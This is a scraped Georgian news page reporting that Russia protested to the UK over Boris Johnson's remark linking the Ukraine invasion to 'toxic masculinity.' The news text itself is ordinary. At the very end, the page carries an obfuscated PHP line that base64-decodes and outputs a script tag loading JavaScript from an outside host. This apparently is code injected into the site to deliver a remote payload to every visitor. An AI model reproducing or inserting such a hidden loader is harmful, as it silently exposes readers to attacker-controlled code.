celsiusi
ავერსი საქკაბელი
მოსკოვმა დიდი ბრიტანეთის მთავრობა რუსეთის ხელისუფლების შეურაცხყოფაში დაადანაშაულა და ბრიტანეთის ელჩს საპროტესტო ნოტა გადასცა. ამის შესახებ რუსეთის საგარეო საქმეთა სამინისტროს ვებ გვერდზე გამოქვეყნებულ განცხადებაშია აღნიშნული.
 
ინფორმაციაში ნათქვამია, რომ ბრიტანელ დიპლომატს პროტესტი გამოუცხადეს დიდი ბრიტანეთის ხელისუფლების მიუღებელი და ღიად შეურაცხმყოფელი რიტორიკის გამო. ასევე ცრუ ინფორმაციის გავრცელებისთვის, რაც უკავშირდება თითქოსდა რუსეთის ხელისუფლების მხრიდან ბირთვული იარაღის გამოყენების მუქარას.
 
„წესიერ საზოგადოებაში ასეთი განცხადებებისთვის ბოდიშის მოხდაა მიღებული”,-ნათქვამია რუსეთის საგარეო უწყების განცხადებაში.
 
როგორც ვარაუდობენ, საპროტესტო ნოტა ეხება დიდი ბრიტანეთის პრემიერ-მინისტრის მიერ გერმანულ მედიასთან გაკეთებულ განცხადებას, სადაც ბორის ჯონსონმა რუსეთის უკრაინაში შეჭრა „ტოქსიკური მასკულანობის გამოვლინებად“ შეაფასა.
 
„პუტინი ქალი რომ ყოფილიყო, ის არ წამოიწყებდა ამ დამპყრობლურ მაჩო-ომს”, – განაცხადა ჯონსონმა.
504
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");